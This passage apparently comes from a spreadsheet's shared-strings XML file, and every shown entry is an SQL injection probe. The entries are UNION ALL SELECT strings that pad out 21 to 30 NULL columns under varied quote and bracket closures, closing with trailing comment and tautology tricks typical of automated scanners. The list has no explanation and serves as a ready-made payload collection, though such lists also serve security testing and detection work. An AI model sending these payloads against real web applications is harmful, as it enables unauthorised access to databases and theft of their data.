  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'hMfG' = 'hMfG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'CrCb' = 'CrCb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'XGhm' = 'XGhm</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'JJti' = 'JJti</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'bjrL' = 'bjrL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'lthm' = 'lthm</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'hoZb' = 'hoZb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'PpEE' = 'PpEE</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'AVAN' = 'AVAN</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ifjY' = 'ifjY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'amav' = 'amav</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'AMHX' = 'AMHX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'kQNp' = 'kQNp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'KEdK' = 'KEdK</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'vHCx' = 'vHCx</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'nIzw' = 'nIzw</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'JXLn' = 'JXLn</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'fWOr' = 'fWOr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'tAEf' LIKE 'tAEf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'jujL' LIKE 'jujL</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'IHiC' LIKE 'IHiC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Sacg' LIKE 'Sacg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'qGTJ' LIKE 'qGTJ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'eNvG' LIKE 'eNvG</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'kdAj' LIKE 'kdAj</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'uWdO' LIKE 'uWdO</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'rSnj' LIKE 'rSnj</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'PhPg' LIKE 'PhPg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'EmWS' LIKE 'EmWS</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'IuIJ' LIKE 'IuIJ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'OvQh' LIKE 'OvQh</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'VLTR' LIKE 'VLTR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'rZbf' LIKE 'rZbf</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'XTQW' LIKE 'XTQW</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'FhmW' LIKE 'FhmW</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'VQzn' LIKE 'VQzn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'nKCk' LIKE 'nKCk</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'OBpi' LIKE 'OBpi</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'jZoM' LIKE 'jZoM</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'qqnT' LIKE 'qqnT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'wJXQ' LIKE 'wJXQ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'iQIL' LIKE 'iQIL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'mzYS' LIKE 'mzYS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'dwNA' LIKE 'dwNA</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'QDhR' LIKE 'QDhR</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'SzuG' LIKE 'SzuG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ljUd' LIKE 'ljUd</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'VutA' LIKE 'VutA</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'IrCm' LIKE 'IrCm</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'nDlX' LIKE 'nDlX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'QUwm' LIKE 'QUwm</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'fWYx' LIKE 'fWYx</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xQgW' LIKE 'xQgW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'wMcO' LIKE 'wMcO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'cFrJ' LIKE 'cFrJ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'kSMv' LIKE 'kSMv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'pdQz' LIKE 'pdQz</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "iKmJ" = "iKmJ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "OINe" = "OINe</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Tsbz" = "Tsbz</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "sjnZ" = "sjnZ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "fMZj" = "fMZj</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "AQjR" = "AQjR</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Tlhz" = "Tlhz</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "CVLQ" = "CVLQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Avnh" = "Avnh</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "npiN" = "npiN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "MxGT" = "MxGT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "cQDw" = "cQDw</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "DFBO" = "DFBO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "VWVB" = "VWVB</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "vZTW" = "vZTW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "PTnK" = "PTnK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "cetY" = "cetY</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "KnjK" = "KnjK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "EdkK" = "EdkK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "hNbh" = "hNbh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "UlKV" = "UlKV</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "OOhV" = "OOhV</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "spJo" = "spJo</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "WSyI" = "WSyI</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "OeCK" = "OeCK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "gsdI" = "gsdI</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "AFOK" = "AFOK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "NYzo" = "NYzo</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "KCsH" = "KCsH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "MUNf" = "MUNf</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "eMzn" = "eMzn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ZnCl" = "ZnCl</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "mivd" = "mivd</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "OYLn" = "OYLn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ozmH" = "ozmH</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "rfWH" = "rfWH</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "mTQB" = "mTQB</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "pXnV" = "pXnV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "TbAg" = "TbAg</t>
  </si>
  <si>
